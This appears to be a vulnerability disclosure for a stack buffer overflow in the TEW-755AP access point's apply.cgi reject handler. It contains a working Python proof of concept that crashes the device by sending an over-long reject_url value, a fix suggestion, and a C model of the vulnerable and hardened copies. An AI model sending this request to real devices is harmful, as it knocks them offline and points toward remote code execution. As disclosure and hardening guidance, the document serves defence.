We found a stack buffer overflow vulnerability in the **TEW-755AP** (firmware version TEW755AP-FW113B01.bin).
In the handler for `action=reject` (sub_41BD60) in /www/cgi/ssi, the value of the `reject_url` POST parameter is copied into the stack buffer v25 with no size check. An attacker who sends a POST request to apply.cgi with a very long `reject_url` value overflows the stack buffer and, with a crafted payload, can achieve remote code execution.
PoC
```python
import requests

# Device address from the report; adjust to the target's LAN IP.
url = "http://192.168.17.221:80/apply.cgi"
# Sent as "Cookie: uid=1234"
cookies = {"uid": "1234"}
data = {
    "action": "reject",            # selects the vulnerable handler (sub_41BD60)
    "login_name": "a",
    "login_pass": "a",
    "login_n": "a",
    "log_pass": "a",
    "html_response_page": "reject.html",
    "reject_url": "a" * 0x1000,    # 4096 bytes, far larger than the stack buffer v25
}
response = requests.post(url, cookies=cookies, data=data, timeout=10)
print(response.text)
print(response)
```
The script sends the crafted HTTP POST request to the device's web server and prints the response.
The server answers with an HTTP 502 error: the `ssi` CGI process crashes when the 4096-byte `reject_url` value ("aaaaaaaaaaaaaaaaaa...") overruns the stack buffer, so the web server has no response to relay. The 502 shows that the handler dies on the over-long input; a crash by itself does not prove control of execution, which should be confirmed by inspecting the crashed process on the device (the program counter and stack at the fault). If the filler were replaced by a payload that overwrites the saved return address, the attacker could take control of the process.
Fix Suggestion:
Bound the copy of `reject_url` to the size of the destination buffer. Note that strncpy alone is not a complete fix: when the input is at least as long as the buffer, strncpy leaves it without a terminating NUL. The handler should check the parameter's length against the buffer size, reject over-long values with an error response, and copy with an explicit terminator (for example snprintf, or a bounded copy followed by writing the NUL byte).
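The following is an added example, not code from the TEW-755AP firmware or from this report. It models the vulnerable pattern and the suggested fix side by side: a stack frame with a fixed-size `reject_url` buffer (the 32-byte size, the `saved_ra` field and its sentinel value are assumptions; the real size of v25 is not given above) followed by the saved return address, an unbounded copy of the PoC's 0x1000-byte value that overwrites that return address, a bounded copy that rejects the value instead, and a check showing why strncpy by itself leaves the buffer unterminated.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the handler's stack frame (constructed for this example): a fixed
 * buffer for reject_url with the saved return address sitting right above it,
 * so a write past the buffer shows up as a change to saved_ra. */
struct frame {
    char reject_url[32];
    uint32_t saved_ra;
};

#define SAVED_RA_SENTINEL 0x0041BD60u  /* stand-in for the frame's saved return address */

/* Constructed input: n bytes of 'a' (the PoC sends 0x1000), NUL-terminated. */
const char *payload_of(size_t n) {
    static char buf[0x1000 + 1];
    if (n > 0x1000) n = 0x1000;
    memset(buf, 'a', n);
    buf[n] = '\0';
    return buf;
}

/* Vulnerable pattern: copy the POST parameter with no size check, i.e. what
 * strcpy(f.reject_url, input) does. The copy is capped at the frame size only
 * so this model stays defined; the firmware has no such cap and the write
 * keeps running up the stack. Returns the saved_ra left in the frame. */
uint32_t vulnerable_copy(const char *input) {
    struct frame f = { {0}, SAVED_RA_SENTINEL };
    size_t n = strlen(input) + 1;          /* bytes strcpy would write */
    if (n > sizeof f) n = sizeof f;
    memcpy(&f, input, n);
    return f.saved_ra;                     /* 0x61616161 after "a" * 0x1000 */
}

/* Hardened copy: refuse anything that does not fit and always NUL-terminate.
 * Returns 0 on success, -1 when the value is too long (answer with 400). */
int safe_copy(const char *input, char *dst, size_t dst_len) {
    if (dst_len == 0) return -1;
    const char *end = memchr(input, '\0', dst_len);   /* NUL must lie within dst_len */
    if (end == NULL) {
        dst[0] = '\0';
        return -1;
    }
    size_t n = (size_t)(end - input);
    memcpy(dst, input, n);
    dst[n] = '\0';
    return 0;
}

/* Hardened handler on the same frame model: saved_ra is untouched for any input. */
uint32_t hardened_copy(const char *input) {
    struct frame f = { {0}, SAVED_RA_SENTINEL };
    if (safe_copy(input, f.reject_url, sizeof f.reject_url) != 0)
        f.reject_url[0] = '\0';            /* over-long value rejected */
    return f.saved_ra;
}

/* Convenience wrapper: does the value fit the 32-byte reject_url buffer? */
int reject_url_fits(const char *input) {
    char buf[32];
    return safe_copy(input, buf, sizeof buf) == 0;
}

/* Why strncpy alone is not a fix: for input of at least dst_len bytes it
 * writes no terminating NUL, so later strlen/printf reads past the buffer.
 * Returns 1 if the buffer ends up unterminated. */
int strncpy_unterminated(const char *input) {
    char buf[32];
    strncpy(buf, input, sizeof buf);
    return memchr(buf, '\0', sizeof buf) == NULL;
}

int main(void) {
    const char *pocs = payload_of(0x1000);
    printf("vulnerable: saved_ra = 0x%08x\n", vulnerable_copy(pocs));
    printf("hardened:   saved_ra = 0x%08x, fits = %d\n",
           hardened_copy(pocs), reject_url_fits(pocs));
    printf("strncpy left buffer unterminated: %d\n", strncpy_unterminated(pocs));
    return 0;
}
```

The vulnerable model reports `saved_ra` as 0x61616161, the bytes of the "a" filler, which is the crash the PoC triggers; a real payload would place a chosen address there. The hardened path leaves the frame intact and rejects the value, and the strncpy check shows that the bounded copy still needs an explicit terminator and a length check.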